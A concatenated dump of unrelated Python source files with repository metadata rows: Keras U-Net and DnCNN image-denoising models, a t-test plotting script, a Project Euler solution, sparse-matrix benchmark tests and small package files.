"Melbourne Renegades":"mr", "Perth Scorchers":"ps", "Sydney Sixers":"ss",
"Sydney Thunder":"st"}
df=pd.DataFrame()
for key in bbTteams:
val = bbTteams[key] + "_details"
val= getTeamBowlingDetails(key,dir=dir1, save=False,odir=".")
df = pd.concat([df,val])
df1=df.groupby('bowler').agg(['count','mean'])
df1.columns = ['_'.join(col).strip() for col in df1.columns.values]
df2 =df1[['wicket_count','wicket_mean','econrate_mean']]
df3=df2[df2['wicket_count']>10]
df4=df3.sort_values(['wicket_mean','econrate_mean'],ascending=False)
df4.columns=['matches','wicket_mean','econrate_mean']
return(df4)
| 31.781233 | 277 | 0.566052 | 18,458 | 171,714 | 5.24591 | 0.051035 | 0.016441 | 0.028772 | 0.017949 | 0.80543 | 0.776617 | 0.749032 | 0.731496 | 0.71807 | 0.693749 | 0 | 0.018561 | 0.255454 | 171,714 | 5,402 | 278 | 31.787116 | 0.738809 | 0.40992 | 0 | 0.704005 | 0 | 0 | 0.211229 | 0.000398 | 0 | 0 | 0 | 0 | 0 | 1 | 0.053632 | false | 0.000679 | 0.007468 | 0 | 0.080109 | 0.027155 | 0 | 0 | 0 | null | 0 | 0 | 0 | 1 | 1 | 1 | 1 | 1 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 7 |
cc7246fb52887bdf2e9930f51cd43668a1eece83 | 153 | py | Python | tests/test_version.py | kianmeng/pytest-localserver | 387eb4a9e2b9a0e116685fd0ed2ace7dd710bb5b | [
"MIT"
] | 8 | 2021-11-10T14:06:36.000Z | 2022-01-12T20:57:31.000Z | tests/test_version.py | kianmeng/pytest-localserver | 387eb4a9e2b9a0e116685fd0ed2ace7dd710bb5b | [
"MIT"
] | 16 | 2021-11-08T19:37:03.000Z | 2022-02-14T12:27:11.000Z | tests/test_version.py | kianmeng/pytest-localserver | 387eb4a9e2b9a0e116685fd0ed2ace7dd710bb5b | [
"MIT"
] | 3 | 2021-11-09T08:07:33.000Z | 2022-02-11T15:07:25.000Z | import pytest_localserver
def test_version():
assert hasattr(pytest_localserver, "VERSION")
assert isinstance(pytest_localserver.VERSION, str)
| 21.857143 | 54 | 0.79085 | 17 | 153 | 6.882353 | 0.588235 | 0.435897 | 0.410256 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0.130719 | 153 | 6 | 55 | 25.5 | 0.879699 | 0 | 0 | 0 | 0 | 0 | 0.045752 | 0 | 0 | 0 | 0 | 0 | 0.5 | 1 | 0.25 | true | 0 | 0.25 | 0 | 0.5 | 0 | 1 | 0 | 0 | null | 1 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 1 | 0 | 1 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 7 |
cc8cc4ba5790a3ff04ceef242282e80ef650aa50 | 204 | py | Python | bluenrg/events/__init__.py | autopi-io/py-bluenrg | f3fa9df8fa9ff86b615aef1782f6bbce80298abf | [
"Apache-2.0"
] | null | null | null | bluenrg/events/__init__.py | autopi-io/py-bluenrg | f3fa9df8fa9ff86b615aef1782f6bbce80298abf | [
"Apache-2.0"
] | null | null | null | bluenrg/events/__init__.py | autopi-io/py-bluenrg | f3fa9df8fa9ff86b615aef1782f6bbce80298abf | [
"Apache-2.0"
] | null | null | null | # NOTE: This file is auto-generated, please do not modify
from .hci import *
from .hci_le_meta import *
from .aci_gap import *
from .aci_gatt_att import *
from .aci_l2cap import *
from .aci_hal import *
| 22.666667 | 57 | 0.75 | 35 | 204 | 4.171429 | 0.6 | 0.342466 | 0.356164 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0.005917 | 0.171569 | 204 | 8 | 58 | 25.5 | 0.857988 | 0.269608 | 0 | 0 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | true | 0 | 1 | 0 | 1 | 0 | 0 | 0 | 0 | null | 1 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 1 | 0 | 1 | 0 | 0 | 7 |
cca624524dcffe635c7e2f757c27c8bb0bb39b8f | 11,181 | py | Python | unet&DnCNN/network.py | wanpiqiu123/Image-denoise-with-meta-learning | 72962e738c0285b9ccaf4db3421cf3a625f78d92 | [
"MIT"
] | 2 | 2020-12-16T08:37:01.000Z | 2022-02-14T02:02:38.000Z | unet&DnCNN/network.py | wanpiqiu123/Image-denoise-with-meta-learning | 72962e738c0285b9ccaf4db3421cf3a625f78d92 | [
"MIT"
] | null | null | null | unet&DnCNN/network.py | wanpiqiu123/Image-denoise-with-meta-learning | 72962e738c0285b9ccaf4db3421cf3a625f78d92 | [
"MIT"
] | null | null | null | import numpy as np
#import tensorflow as tf
from keras.initializers import TruncatedNormal
from keras.models import Model
from keras.layers import Dropout,UpSampling2D,MaxPooling2D,Dense,Subtract
from keras.layers import Input,Conv2D,concatenate,Activation,BatchNormalization
from keras.optimizers import Adam
from config import *
from utils import m_psnr
#from keras import backend as K
def Unet():
inputs = Input(shape=(IMG_H,IMG_W,NUM_C))
conv1 = Conv2D(64, 3, activation = 'relu', padding = 'same', kernel_initializer = 'he_normal')(inputs)
pool1 = MaxPooling2D(pool_size=(2, 2))(conv1)
conv2 = Conv2D(128, 3, activation = 'relu', padding = 'same', kernel_initializer = 'he_normal')(pool1)
pool2 = MaxPooling2D(pool_size=(2, 2))(conv2)
conv3 = Conv2D(256, 3, activation = 'relu', padding = 'same', kernel_initializer = 'he_normal')(pool2)
pool3 = MaxPooling2D(pool_size=(2, 2))(conv3)
conv4 = Conv2D(512, 3, activation = 'relu', padding = 'same', kernel_initializer = 'he_normal')(pool3)
drop4 = Dropout(0.5)(conv4)
pool4 = MaxPooling2D(pool_size=(2, 2))(drop4)
conv5 = Conv2D(1024, 3, activation = 'relu', padding = 'same', kernel_initializer = 'he_normal')(pool4)
drop5 = Dropout(0.5)(conv5)
up6 = Conv2D(512, 2, activation = 'relu', padding = 'same', kernel_initializer = 'he_normal')(UpSampling2D(size = (2,2))(drop5))
merge6 = concatenate([drop4,up6], axis = 3)
conv6 = Conv2D(512, 3, activation = 'relu', padding = 'same', kernel_initializer = 'he_normal')(merge6)
up7 = Conv2D(256, 2, activation = 'relu', padding = 'same', kernel_initializer = 'he_normal')(UpSampling2D(size = (2,2))(conv6))
merge7 = concatenate([conv3,up7], axis = 3)
conv7 = Conv2D(256, 3, activation = 'relu', padding = 'same', kernel_initializer = 'he_normal')(merge7)
up8 = Conv2D(128, 2, activation = 'relu', padding = 'same', kernel_initializer = 'he_normal')(UpSampling2D(size = (2,2))(conv7))
merge8 = concatenate([conv2,up8], axis = 3)
conv8 = Conv2D(128, 3, activation = 'relu', padding = 'same', kernel_initializer = 'he_normal')(merge8)
up9 = Conv2D(64, 2, activation = 'relu', padding = 'same', kernel_initializer = 'he_normal')(UpSampling2D(size = (2,2))(conv8))
merge9 = concatenate([conv1,up9], axis = 3)
conv9 = Conv2D(64, 3, activation = 'relu', padding = 'same', kernel_initializer = 'he_normal')(merge9)
conv9 = Conv2D(8, 3, activation = 'relu', padding = 'same', kernel_initializer = 'he_normal')(conv9)
conv10 = Conv2D(3, 1, activation = 'sigmoid')(conv9)
model = Model(inputs = inputs, outputs = conv10)
# model.summary()
return model
# model.compile(optimizer = Adam(lr = 1e-4), loss = 'mse', metrics = [m_psnr])
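# Training sketch (an assumption-laden example, not part of the original script;
# x_noisy/x_clean are hypothetical arrays of shape (N, IMG_H, IMG_W, NUM_C) in [0, 1]):
#   model = Unet()
#   model.compile(optimizer=Adam(lr=1e-4), loss='mse', metrics=[m_psnr])
#   model.fit(x_noisy, x_clean, batch_size=16, epochs=10, validation_split=0.1)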
def Unet1():
inputs = Input(shape=(IMG_H,IMG_W,NUM_C))
conv1 = Conv2D(64, 3, activation = 'relu', padding = 'same', kernel_initializer = 'he_normal')(inputs)
pool1 = MaxPooling2D(pool_size=(2, 2))(conv1)
conv2 = Conv2D(64, 3, activation = 'relu', padding = 'same', kernel_initializer = 'he_normal')(pool1)
pool2 = MaxPooling2D(pool_size=(2, 2))(conv2)
conv3 = Conv2D(64, 3, activation = 'relu', padding = 'same', kernel_initializer = 'he_normal')(pool2)
pool3 = MaxPooling2D(pool_size=(2, 2))(conv3)
conv4 = Conv2D(64, 3, activation = 'relu', padding = 'same', kernel_initializer = 'he_normal')(pool3)
drop4 = Dropout(0.5)(conv4)
pool4 = MaxPooling2D(pool_size=(2, 2))(drop4)
conv5 = Conv2D(64, 3, activation = 'relu', padding = 'same', kernel_initializer = 'he_normal')(pool4)
drop5 = Dropout(0.5)(conv5)
up6 = Conv2D(64, 2, activation = 'relu', padding = 'same', kernel_initializer = 'he_normal')(UpSampling2D(size = (2,2))(drop5))
merge6 = concatenate([drop4,up6], axis = 3)
conv6 = Conv2D(64, 3, activation = 'relu', padding = 'same', kernel_initializer = 'he_normal')(merge6)
up7 = Conv2D(64, 2, activation = 'relu', padding = 'same', kernel_initializer = 'he_normal')(UpSampling2D(size = (2,2))(conv6))
merge7 = concatenate([conv3,up7], axis = 3)
conv7 = Conv2D(64, 3, activation = 'relu', padding = 'same', kernel_initializer = 'he_normal')(merge7)
up8 = Conv2D(64, 2, activation = 'relu', padding = 'same', kernel_initializer = 'he_normal')(UpSampling2D(size = (2,2))(conv7))
merge8 = concatenate([conv2,up8], axis = 3)
conv8 = Conv2D(64, 3, activation = 'relu', padding = 'same', kernel_initializer = 'he_normal')(merge8)
up9 = Conv2D(64, 2, activation = 'relu', padding = 'same', kernel_initializer = 'he_normal')(UpSampling2D(size = (2,2))(conv8))
merge9 = concatenate([conv1,up9], axis = 3)
conv9 = Conv2D(64, 3, activation = 'relu', padding = 'same', kernel_initializer = 'he_normal')(merge9)
conv9 = Conv2D(8, 3, activation = 'relu', padding = 'same', kernel_initializer = 'he_normal')(conv9)
conv10 = Conv2D(3, 1, activation = 'sigmoid')(conv9)
model = Model(inputs = inputs, outputs = conv10)
# model.summary()
return model
# model.compile(optimizer = Adam(lr = 1e-4), loss = 'mse', metrics = [m_psnr])
def Unet2():
inputs = Input(shape=(IMG_H,IMG_W,NUM_C))
conv1 = Conv2D(64, 3, activation = 'relu', padding = 'same', kernel_initializer = 'he_normal')(inputs)
pool1 = MaxPooling2D(pool_size=(2, 2))(conv1)
conv2 = Conv2D(32, 3, activation = 'relu', padding = 'same', kernel_initializer = 'he_normal')(pool1)
pool2 = MaxPooling2D(pool_size=(2, 2))(conv2)
conv3 = Conv2D(16, 3, activation = 'relu', padding = 'same', kernel_initializer = 'he_normal')(pool2)
pool3 = MaxPooling2D(pool_size=(2, 2))(conv3)
conv4 = Conv2D(8, 3, activation = 'relu', padding = 'same', kernel_initializer = 'he_normal')(pool3)
pool4 = MaxPooling2D(pool_size=(2, 2))(conv4)
conv5 = Conv2D(4, 3, activation = 'relu', padding = 'same', kernel_initializer = 'he_normal')(pool4)
up6 = Conv2D(4, 2, activation = 'relu', padding = 'same', kernel_initializer = 'he_normal')(UpSampling2D(size = (2,2))(conv5))
merge6 = concatenate([conv4,up6], axis = 3)
conv6 = Conv2D(8, 3, activation = 'relu', padding = 'same', kernel_initializer = 'he_normal')(merge6)
up7 = Conv2D(8, 2, activation = 'relu', padding = 'same', kernel_initializer = 'he_normal')(UpSampling2D(size = (2,2))(conv6))
merge7 = concatenate([conv3,up7], axis = 3)
conv7 = Conv2D(16, 3, activation = 'relu', padding = 'same', kernel_initializer = 'he_normal')(merge7)
up8 = Conv2D(16, 2, activation = 'relu', padding = 'same', kernel_initializer = 'he_normal')(UpSampling2D(size = (2,2))(conv7))
merge8 = concatenate([conv2,up8], axis = 3)
conv8 = Conv2D(32, 3, activation = 'relu', padding = 'same', kernel_initializer = 'he_normal')(merge8)
up9 = Conv2D(32, 2, activation = 'relu', padding = 'same', kernel_initializer = 'he_normal')(UpSampling2D(size = (2,2))(conv8))
merge9 = concatenate([conv1,up9], axis = 3)
conv9 = Conv2D(8, 3, activation = 'relu', padding = 'same', kernel_initializer = 'he_normal')(merge9)
conv10 = Conv2D(3, 1, activation = 'sigmoid')(conv9)
model = Model(inputs = inputs, outputs = conv10)
# model.summary()
return model
# model.compile(optimizer = Adam(lr = 1e-4), loss = 'mse', metrics = [m_psnr])
def Unet3():
inputs = Input(shape=(IMG_H,IMG_W,NUM_C))
conv1 = Conv2D(256, 3, activation = 'relu', padding = 'same', kernel_initializer = 'he_normal')(inputs)
pool1 = MaxPooling2D(pool_size=(2, 2))(conv1)
conv2 = Conv2D(128, 3, activation = 'relu', padding = 'same', kernel_initializer = 'he_normal')(pool1)
pool2 = MaxPooling2D(pool_size=(2, 2))(conv2)
conv3 = Conv2D(64, 3, activation = 'relu', padding = 'same', kernel_initializer = 'he_normal')(pool2)
pool3 = MaxPooling2D(pool_size=(2, 2))(conv3)
conv4 = Conv2D(32, 3, activation = 'relu', padding = 'same', kernel_initializer = 'he_normal')(pool3)
pool4 = MaxPooling2D(pool_size=(2, 2))(conv4)
conv5 = Conv2D(16, 3, activation = 'relu', padding = 'same', kernel_initializer = 'he_normal')(pool4)
up6 = Conv2D(16, 2, activation = 'relu', padding = 'same', kernel_initializer = 'he_normal')(UpSampling2D(size = (2,2))(conv5))
conv6 = Conv2D(32, 3, activation = 'relu', padding = 'same', kernel_initializer = 'he_normal')(up6)
up7 = Conv2D(32, 2, activation = 'relu', padding = 'same', kernel_initializer = 'he_normal')(UpSampling2D(size = (2,2))(conv6))
conv7 = Conv2D(64, 3, activation = 'relu', padding = 'same', kernel_initializer = 'he_normal')(up7)
up8 = Conv2D(64, 2, activation = 'relu', padding = 'same', kernel_initializer = 'he_normal')(UpSampling2D(size = (2,2))(conv7))
conv8 = Conv2D(32, 3, activation = 'relu', padding = 'same', kernel_initializer = 'he_normal')(up8)
up9 = Conv2D(32, 2, activation = 'relu', padding = 'same', kernel_initializer = 'he_normal')(UpSampling2D(size = (2,2))(conv8))
conv9 = Conv2D(8, 3, activation = 'relu', padding = 'same', kernel_initializer = 'he_normal')(up9)
conv10 = Conv2D(3, 1, activation = 'sigmoid')(conv9)
model = Model(inputs = inputs, outputs = conv10)
# model.summary()
return model
# model.compile(optimizer = Adam(lr = 1e-4), loss = 'mse', metrics = [m_psnr])
def MLP():
inputs = Input(shape=(EMBEDDING_SHAPE))
layer = Dense(32,activation="relu",kernel_initializer=TruncatedNormal(mean=0.0, stddev=0.01))(inputs)
layer = Dense(256,activation="relu",kernel_initializer=TruncatedNormal(mean=0.0, stddev=0.01))(layer)
layer = Dropout(0.3)(layer)
layer = Dense(256,activation="relu",kernel_initializer=TruncatedNormal(mean=0.0, stddev=0.01))(layer)
layer = Dropout(0.3)(layer)
layer = Dense(512,activation="relu",kernel_initializer=TruncatedNormal(mean=0.0, stddev=0.01))(layer)
layer = Dropout(0.3)(layer)
layer = Dense(512,activation="relu",kernel_initializer=TruncatedNormal(mean=0.0, stddev=0.01))(layer)
layer = Dropout(0.3)(layer)
layer = Dense(256,activation="relu",kernel_initializer=TruncatedNormal(mean=0.0, stddev=0.01))(layer)
layer = Dropout(0.3)(layer)
layer = Dense(256,activation="relu",kernel_initializer=TruncatedNormal(mean=0.0, stddev=0.01))(layer)
layer = Dropout(0.3)(layer)
layer = Dense(32,activation="relu",kernel_initializer=TruncatedNormal(mean=0.0, stddev=0.01))(layer)
outputs = Dense(4,activation="sigmoid",kernel_initializer=TruncatedNormal(mean=0.0, stddev=0.01))(layer)
model = Model(inputs = inputs, outputs = outputs)
return model
def DnCNN():
inpt = Input(shape=(None,None,NUM_C))
# 1st layer, Conv+relu
x = Conv2D(filters=64, kernel_size=(3,3), strides=(1,1), padding='same')(inpt)
x = Activation('relu')(x)
# 15 layers, Conv+BN+relu
for i in range(15):
x = Conv2D(filters=64, kernel_size=(3,3), strides=(1,1), padding='same')(x)
x = BatchNormalization(axis=-1, epsilon=1e-3)(x)
x = Activation('relu')(x)
# last layer, Conv
x = Conv2D(filters=NUM_C, kernel_size=(3,3), strides=(1,1), padding='same')(x)
x = Subtract()([inpt, x]) # input - noise
model = Model(inputs=inpt, outputs=x)
return model
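# Usage sketch: because of the final Subtract layer, the convolutional stack learns
# the noise residual and the model outputs input - noise, i.e. the denoised image.
# (x_noisy/x_clean below are hypothetical training arrays, as in the Unet sketch above.)
#   dncnn = DnCNN()
#   dncnn.compile(optimizer=Adam(lr=1e-3), loss='mse', metrics=[m_psnr])
#   dncnn.fit(x_noisy, x_clean, batch_size=16, epochs=10)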
# if __name__== '__main__':
# print(NUM_C) | 62.116667 | 132 | 0.665504 | 1,469 | 11,181 | 4.953029 | 0.088496 | 0.123145 | 0.155855 | 0.185542 | 0.896372 | 0.890874 | 0.890874 | 0.890874 | 0.890874 | 0.890874 | 0 | 0.071482 | 0.162955 | 11,181 | 180 | 133 | 62.116667 | 0.705951 | 0.048654 | 0 | 0.551724 | 0 | 0 | 0.094615 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0.041379 | false | 0 | 0.055172 | 0 | 0.137931 | 0 | 0 | 0 | 0 | null | 0 | 0 | 1 | 1 | 1 | 1 | 1 | 1 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 7 |
aeb618a37848ec6e5ceeb3239e54c2e435985381 | 2,328 | py | Python | scripts/ttest.py | Lila14/multimds | e54642e0ae47592321352f931f534881ca57d888 | [
"MIT"
] | null | null | null | scripts/ttest.py | Lila14/multimds | e54642e0ae47592321352f931f534881ca57d888 | [
"MIT"
] | null | null | null | scripts/ttest.py | Lila14/multimds | e54642e0ae47592321352f931f534881ca57d888 | [
"MIT"
] | null | null | null | import numpy as np
from scipy import stats as st
import sys
from matplotlib import pyplot as plt
mat1 = np.loadtxt(sys.argv[1], dtype=object)
enrichments1 = np.array(mat1[:,6], dtype=float)
mat2 = np.loadtxt(sys.argv[2], dtype=object)
enrichments2 = np.array(mat2[:,6], dtype=float)
print(st.ttest_ind(enrichments1, enrichments2))
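#note: st.ttest_ind assumes equal variances by default; if the two enrichment groups
#may differ in variance, Welch's t-test via st.ttest_ind(enrichments1, enrichments2, equal_var=False) is safer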
xs = enrichments1
#need to know bins to get y range
bins = plt.hist(xs)
plt.close()
#start with a frameless plot (extra room on the left)
plt.subplot2grid((10,10), (0,0), 9, 10, frameon=False)
#label axes
plt.xlabel("GM12878 enhancer coverage", fontsize=14)
plt.title("Relocalized", fontsize=14)
#define offsets
xmin = min(xs)
xmax = max(xs)
x_range = xmax - xmin
x_start = xmin - x_range/25. #bigger offset for bar plot
x_end = xmax + x_range/25.
ymin = 0
ymax = max(bins[0])
y_range = ymax - ymin
#y_start = ymin - y_range/25.
y_start = 0
y_end = ymax + y_range/25.
#plot
plt.hist(xs, rwidth=0.8, bottom=y_start)
#define axes with offsets
plt.axis([x_start, x_end, y_start, y_end], frameon=False)
#plot axes (black with line width of 4)
plt.axvline(x=x_start, color="k", lw=4)
plt.axhline(y=y_start, color="k", lw=4)
#plot ticks
plt.tick_params(direction="out", top=False, right=False, length=12, width=3, pad=5, labelsize=12)
plt.savefig("relocalization_enhancer_coverage")
plt.close()
xs = enrichments2
#need to know bins to get y range
bins = plt.hist(xs)
plt.close()
#start with a frameless plot (extra room on the left)
plt.subplot2grid((10,10), (0,0), 9, 10, frameon=False)
#label axes
plt.xlabel("GM12878 enhancer coverage", fontsize=14)
plt.title("Background", fontsize=14)
#define offsets
xmin = min(xs)
xmax = max(xs)
x_range = xmax - xmin
x_start = xmin - x_range/25. #bigger offset for bar plot
x_end = xmax + x_range/25.
ymin = 0
ymax = max(bins[0])
y_range = ymax - ymin
#y_start = ymin - y_range/25.
y_start = 0
y_end = ymax + y_range/25.
#plot
plt.hist(xs, rwidth=0.8, bottom=y_start)
#define axes with offsets
plt.axis([x_start, x_end, y_start, y_end], frameon=False)
#plot axes (black with line width of 4)
plt.axvline(x=x_start, color="k", lw=4)
plt.axhline(y=y_start, color="k", lw=4)
#plot ticks
plt.tick_params(direction="out", top=False, right=False, length=12, width=3, pad=5, labelsize=12)
plt.savefig("background_enhancer_coverage")
plt.close()
| 24.505263 | 97 | 0.719072 | 418 | 2,328 | 3.901914 | 0.260766 | 0.036787 | 0.022072 | 0.031882 | 0.772532 | 0.772532 | 0.772532 | 0.772532 | 0.772532 | 0.772532 | 0 | 0.047761 | 0.136598 | 2,328 | 94 | 98 | 24.765957 | 0.763682 | 0.204467 | 0 | 0.727273 | 0 | 0 | 0.076965 | 0.032751 | 0 | 0 | 0 | 0 | 0 | 0 | null | null | 0 | 0.072727 | null | null | 0.018182 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 1 | 1 | 1 | 1 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 7 |
aedb5bf037c348ce36b3534cb71be656ae15d70c | 1,719 | py | Python | soluciones/problema8.py | hernan-erasmo/project-euler | d68aa90c5fe2bf733bec54af5a786a2c144783bc | [
"Unlicense"
] | null | null | null | soluciones/problema8.py | hernan-erasmo/project-euler | d68aa90c5fe2bf733bec54af5a786a2c144783bc | [
"Unlicense"
] | null | null | null | soluciones/problema8.py | hernan-erasmo/project-euler | d68aa90c5fe2bf733bec54af5a786a2c144783bc | [
"Unlicense"
] | null | null | null | def main():
numerote = """73167176531330624919225119674426574742355349194934
96983520312774506326239578318016984801869478851843
85861560789112949495459501737958331952853208805511
12540698747158523863050715693290963295227443043557
66896648950445244523161731856403098711121722383113
62229893423380308135336276614282806444486645238749
30358907296290491560440772390713810515859307960866
70172427121883998797908792274921901699720888093776
65727333001053367881220235421809751254540594752243
52584907711670556013604839586446706324415722155397
53697817977846174064955149290862569321978468622482
83972241375657056057490261407972968652414535100474
82166370484403199890008895243450658541227588666881
16427171479924442928230863465674813919123162824586
17866458359124566529476545682848912883142607690042
24219022671055626321111109370544217506941658960408
07198403850962455444362981230987879927244284909188
84580156166097919133875499200524063689912560717606
05886116467109405077541002256983155200055935729725
71636269561882670428252483600823257530420752963450"""
maximo_producto = 0
n = numerote.replace('\n',"")
size_feta = 13
#Advancing one at a time: the number of times I will
#take size_feta elements from the list
rango_fetas = len(n) - size_feta + 1
for i in range(rango_fetas):
prod = functools.reduce(operator.mul, [int(x) for x in n[i:size_feta+i]], 1) #http://stackoverflow.com/a/19334399/1603080
if prod > maximo_producto:
maximo_producto = prod
print "El maximo_producto formado por un subconjunto de 13 digitos es: " + str(maximo_producto)
if __name__ == '__main__':
import operator #http://stackoverflow.com/a/13840436/1603080
import functools #http://stackoverflow.com/a/13840436/1603080
main()
| 40.928571 | 123 | 0.874346 | 127 | 1,719 | 11.685039 | 0.598425 | 0.04717 | 0.040431 | 0.042453 | 0.048518 | 0.048518 | 0 | 0 | 0 | 0 | 0 | 0.661219 | 0.074462 | 1,719 | 41 | 124 | 41.926829 | 0.271527 | 0.123909 | 0 | 0 | 0 | 0 | 0.728181 | 0.666223 | 0 | 1 | 0 | 0 | 0 | 0 | null | null | 0 | 0.058824 | null | null | 0.029412 | 0 | 0 | 1 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | 0 | 0 | 1 | 1 | null | 1 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 7 |
aefcf1368fa19dae691996818672035b1791bfd5 | 6,459 | py | Python | tests/test_cvb.py | harenbrs/sparsulant | a55cba9a54da4d3e63fc3aae5c262097196e3784 | [
"MIT"
] | null | null | null | tests/test_cvb.py | harenbrs/sparsulant | a55cba9a54da4d3e63fc3aae5c262097196e3784 | [
"MIT"
] | null | null | null | tests/test_cvb.py | harenbrs/sparsulant | a55cba9a54da4d3e63fc3aae5c262097196e3784 | [
"MIT"
] | null | null | null | from functools import lru_cache
import pytest
import numpy as np
from sparsulant import cvb_matrix, cir_matrix, nbytes
@pytest.mark.benchmark(group='cvb[cir]-vmul')
class TestCIRBlockVectorMultiplication:
@lru_cache(maxsize=1, typed=True)
def get_setup(self, n_blocks, block_shape, block_shift, shift, density):
shape = (n_blocks*block_shape[0], block_shape[1])
state = np.random.RandomState(0)
row = state.uniform(-1, 1, shape[1])
vector = state.uniform(-1, 1, shape[1])
if isinstance(density, int) and density == 1:
cir = cir_matrix((row, block_shift), block_shape)
else:
mask = state.uniform(0, 1, shape[1]) <= density
data = row[mask]
offsets, = np.nonzero(mask)
cir = cir_matrix((data, offsets, block_shift), block_shape)
return cvb_matrix((cir, shift), shape), vector
def test_cvb_cir_vmul(
self, n_blocks, block_shape, block_shift, shift, density, benchmark
):
cvb, vector = self.get_setup(n_blocks, block_shape, block_shift, shift, density)
result = benchmark(cvb._mul_vector, vector)
assert np.allclose(result, cvb.tocsr()._mul_vector(vector))
benchmark.extra_info['memory'] = nbytes(cvb)
def test_cvb_cir_vmul_baseline(
self, n_blocks, block_shape, block_shift, shift, density, benchmark
):
cvb, vector = self.get_setup(n_blocks, block_shape, block_shift, shift, density)
csr = cvb.tocsr()
benchmark(csr._mul_vector, vector)
benchmark.extra_info['memory'] = nbytes(csr)
@pytest.mark.benchmark(group='cvb[cir]-mmul')
class TestCIRBlockMatrixMultiplication:
@lru_cache(maxsize=1, typed=True)
def get_setup(self, n_blocks, block_shape, block_shift, shift, density):
shape = (n_blocks*block_shape[0], block_shape[1])
state = np.random.RandomState(0)
row = state.uniform(-1, 1, shape[1])
matrix = state.uniform(-1, 1, (shape[1], shape[1]//10))
if isinstance(density, int) and density == 1:
cir = cir_matrix((row, block_shift), block_shape)
else:
mask = state.uniform(0, 1, shape[1]) <= density
data = row[mask]
offsets, = np.nonzero(mask)
cir = cir_matrix((data, offsets, block_shift), block_shape)
return cvb_matrix((cir, shift), shape), matrix
def test_cvb_cir_mmul(
self, n_blocks, block_shape, block_shift, shift, density, benchmark
):
cvb, matrix = self.get_setup(n_blocks, block_shape, block_shift, shift, density)
result = benchmark(cvb._mul_multivector, matrix)
assert np.allclose(result, cvb.tocsr()._mul_multivector(matrix))
benchmark.extra_info['memory'] = nbytes(cvb)
def test_cvb_cir_mmul_baseline(
self, n_blocks, block_shape, block_shift, shift, density, benchmark
):
cvb, matrix = self.get_setup(n_blocks, block_shape, block_shift, shift, density)
csr = cvb.tocsr()
benchmark(csr._mul_multivector, matrix)
benchmark.extra_info['memory'] = nbytes(csr)
@pytest.mark.benchmark(group='cvb[csr]-vmul')
class TestCSRBlockVectorMultiplication:
@lru_cache(maxsize=1, typed=True)
def get_setup(self, n_blocks, block_shape, block_shift, shift, density):
shape = (n_blocks*block_shape[0], block_shape[1])
state = np.random.RandomState(0)
row = state.uniform(-1, 1, shape[1])
vector = state.uniform(-1, 1, shape[1])
if isinstance(density, int) and density == 1:
cir = cir_matrix((row, block_shift), block_shape)
else:
mask = state.uniform(0, 1, shape[1]) <= density
data = row[mask]
offsets, = np.nonzero(mask)
cir = cir_matrix((data, offsets, block_shift), block_shape)
return cvb_matrix((cir.tocsr(), shift), shape), vector
def test_cvb_csr_vmul(
self, n_blocks, block_shape, block_shift, shift, density, benchmark
):
cvb, vector = self.get_setup(n_blocks, block_shape, block_shift, shift, density)
result = benchmark(cvb._mul_vector, vector)
assert np.allclose(result, cvb.tocsr()._mul_vector(vector))
benchmark.extra_info['memory'] = nbytes(cvb)
def test_cvb_csr_vmul_baseline(
self, n_blocks, block_shape, block_shift, shift, density, benchmark
):
cvb, vector = self.get_setup(n_blocks, block_shape, block_shift, shift, density)
csr = cvb.tocsr()
benchmark(csr._mul_vector, vector)
benchmark.extra_info['memory'] = nbytes(csr)
@pytest.mark.benchmark(group='cvb[csr]-mmul')
class TestCSRBlockMatrixMultiplication:
@lru_cache(maxsize=1, typed=True)
def get_setup(self, n_blocks, block_shape, block_shift, shift, density):
shape = (n_blocks*block_shape[0], block_shape[1])
state = np.random.RandomState(0)
row = state.uniform(-1, 1, shape[1])
matrix = state.uniform(-1, 1, (shape[1], shape[1]//10))
if isinstance(density, int) and density == 1:
cir = cir_matrix((row, block_shift), block_shape)
else:
mask = state.uniform(0, 1, shape[1]) <= density
data = row[mask]
offsets, = np.nonzero(mask)
cir = cir_matrix((data, offsets, block_shift), block_shape)
return cvb_matrix((cir.tocsr(), shift), shape), matrix
def test_cvb_csr_mmul(
self, n_blocks, block_shape, block_shift, shift, density, benchmark
):
cvb, matrix = self.get_setup(n_blocks, block_shape, block_shift, shift, density)
result = benchmark(cvb._mul_multivector, matrix)
assert np.allclose(result, cvb.tocsr()._mul_multivector(matrix))
benchmark.extra_info['memory'] = nbytes(cvb)
def test_cvb_csr_mmul_baseline(
self, n_blocks, block_shape, block_shift, shift, density, benchmark
):
cvb, matrix = self.get_setup(n_blocks, block_shape, block_shift, shift, density)
csr = cvb.tocsr()
benchmark(csr._mul_multivector, matrix)
benchmark.extra_info['memory'] = nbytes(csr)
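# Running these benchmarks (a sketch; assumes the parameters n_blocks, block_shape,
# block_shift, shift and density are supplied as pytest fixtures, e.g. via conftest.py):
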